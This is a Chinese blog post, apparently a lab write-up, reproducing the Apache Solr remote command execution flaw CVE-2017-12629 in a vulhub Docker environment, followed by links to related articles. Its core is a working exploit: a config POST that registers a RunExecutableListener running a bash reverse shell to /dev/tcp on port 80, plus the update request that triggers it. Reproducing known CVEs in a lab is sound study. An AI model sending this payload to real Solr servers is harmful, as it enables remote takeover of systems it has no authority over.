Apache Solr 远程命令执行漏洞复现(CVE-2017-12629)

最新推荐文章于 2024-05-12 14:14:04 发布
最新推荐文章于 2024-05-12 14:14:04 发布
阅读量641 收藏 2
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/107169772
版权

Apache Solr 远程命令执行漏洞复现(CVE-2017-12629)

前言

影响版本
Apache Solr < 7.1
Apache Lucene < 7.1

环境搭建

启动docker

systemctl start docker

获取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/solr/CVE-2017-12629-RCE/

启动容器

docker-compose up -d

查看容器

docker ps

在这里插入图片描述

漏洞复现

在centos上启动监听

nc -lvvp 80

创建一个listener

POST /solr/demo/config HTTP/1.1
Host: 192.168.164.162:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 185

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.164.162/80 0>&1"]}}

触发刚才添加的listener

POST /solr/demo/update HTTP/1.1
Host: 192.168.164.162:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]

在这里插入图片描述

参考文章

https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/

whojoe
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以使用各种不同类型的数据源来构造 Exploit1使用数据源的类型为URLDataSource Exploit2使用的数据源类型为ContentStreamDataSource 检测突破-Exploit1 Exploit1使用数据源的类型为URLDataSource 优点:结果回显支持对Solr低版本的检测 缺点:需要出网 步骤1 构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!)可以直接使用这个 文档demo.xml即URLDataSource类型的数据源一份无害的正常XML文档 文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
Apache Solr 远程命令执行漏洞CVE-2017-12629
黑白的博客
11-22 2628
声明 好好学习,天天向上 漏洞描述 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 本环境测试RCE漏洞。 影响范围 Apache Sol
其他的 框架安全:Apache Solr 远程代码漏洞.(CVE-2019-0193)
最新发布
网络安全领域___专研者.
05-12 814
Apache Solr是一个开源的搜索服务,便用Java语言开发,主要基于 HTTP 和ApacheLucene 实现的。Sor是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。
Apache Solr远程命令执行漏洞复现+批量检测脚本
qq_26012889的博客
11-18 890
漏洞复现的详细过程这里就不过多赘述了吧。 这个在公众号中已经放出 各位多多关注 公众号:家国安全 来自极安中国 原文链接https://bbs.secgeeker.net/thread-1419-1-1.html 复现漏洞利用过程 https://mp.weixin.qq.com/s/sEyYh2-8cbvDDBYkZcvImg Apache Solr远程命令执行漏洞复现 漏洞批量检测脚本 漏洞已...
CVE-2017-12629 xxe漏洞复现
xinyue9966的博客
03-21 1116
一、实验介绍 1.漏洞介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。 2.影响版本 Apache Solr before 7.1 with Apache Lucene before 7.1 E
CVE-2017-12629Apache Solr RCE命令执行漏洞复现
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
02-16 4413
当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改.apache solr默认继承VelocityResponseWriter插件.Apache solr远程命令执行(CVE-2019-0193).
CVE-2020-13957 Apache Solr 未授权上传.md
04-13
CVE-2020-13957 Apache Solr 未授权上传
Apache Solrsolr-8.11.1-src.tgz)
01-10
标题中的"solr-8.11.1-src.tgz"表明这是Apache Solr 8.11.1版本的源代码包,适用于那些希望对Solr进行深度定制或开发的用户。 源代码发布通常包含了编译和构建Solr所需的所有文件,包括Java源代码、配置文件、测试...
Apache Solr 远程命令执行漏洞复现CVE-2019-0193)
Heytoo的博客
06-29 822
Apache Solr 远程命令执行漏洞复现CVE-2019-0193) 0x00 简介 Solr的目标用户:“需要搜索框、分面浏览(导航)或者两者结合的任何人”。 Solr的关键特性包括: 基于标准的开放接口——Solr搜索服务器支持通过XML、JSON和HTTP查询和获取结果。 易管理——Solr可以通过HTML页面管理,服务器统计数据以JMX输出,Solr配置通过XML完成。 分面浏览——搜索结果自动分类。 突出显示命中词——匹配的字符自动在搜索结果中...
【vulhub】Apache Solr 远程命令执行漏洞CVE-2017-12629复现
qq_45300786的博客
09-15 1360
特征 访问8983端口即可查看到Apache solr的管理页面,无需登录。(可能换端口) 网站title是Solr Admin,图标有点像一朵红色的花 影响版本 Apache Solr 5.5.0到7.0.1版本 漏洞利用 此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 https://paper.seebug.org/425/ 这里我看了下vulhub官方的文档,首先创建一个listener
[漏洞复现] Apache Solr XXE(CVE-2017-12629)
Vicl1fe的博客
06-10 1244
前言 什么是Lucene Lucene 是一个高效的,基于 Java 的全文检索库。 Lucene 是 apache 软件基金会 4 jakarta 项目组的一个子项目,是一个开放源代码的全 文检索引擎工具包,但它不是一个完整的全文检索引擎,而是一个全文检索引擎的架构, Lucene主要提供了一个简单、强大的应用程序接口。 什么是solr Solr 是基于 Lucene 的面向企业搜索的 web 应用 ,Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口
apache solr漏洞复现
Shanfenglan's blog
12-01 1687
文章目录1. 什么是Apache solr2. Apache solr rce CVE-2017-126292.1 利用3. Apache Solr 远程命令执行漏洞CVE-2019-0193)3.1 利用4. Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)4.1 利用5. 任意文件读取参考文章 1. 什么是Apache solr Apache solr约等于ElecticSearch,是一个开源的搜索引擎。Solr 使用 Java 语言开发,主要基于 H
漏洞复现----3、Apache Solr 远程命令执行漏洞CVE-2017-12629
七天
11-30 2324
文章目录一、Apache Solr 简介二、CVE-2017-12629简介三、漏洞复现3.1、使用postCommit3.2、使用newSearcher 一、Apache Solr 简介 Solr是基于Lucene的面向企业搜索的web应用,是一个独立的企业级搜索应用服务器。它对外提供类似于Web-service的API接口。 用户可以通过HTTP请求,向搜索引擎服务器提交一定格式的XML文件,生成索引; 也可以通过HTTP GET操作提出查找请求,并得到Xml/json格式的返回结果。 Lucene
Apache Solr漏洞复现汇总
千寻的博客
03-31 1952
Apache Solr漏洞复现汇总
Apache Solr 远程命令执行漏洞CVE-2017-12629复现
HEAVEN569的博客
06-21 1299
Apache Solr 远程命令执行漏洞CVE-2017-12629复现
浅浅浅浅谈XXE漏洞(附XXE攻击实例CVE-2017-12629)
SoulCat
03-06 3801
- `山有木兮木有枝,心悦君兮君不知`
Apache Solr 2020安全漏洞CVE-13957:未经授权的上传与RCE风险
例如,在Solr 7.7.0中,攻击者需要进入`/solr-7.7.0/server/solr/configsets/sample_techproducts_configs/conf`目录,并使用`zip-r-*>mytest.zip`命令打包恶意内容。 2. 攻击者通过`curl`发送带有`Content-Type: ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值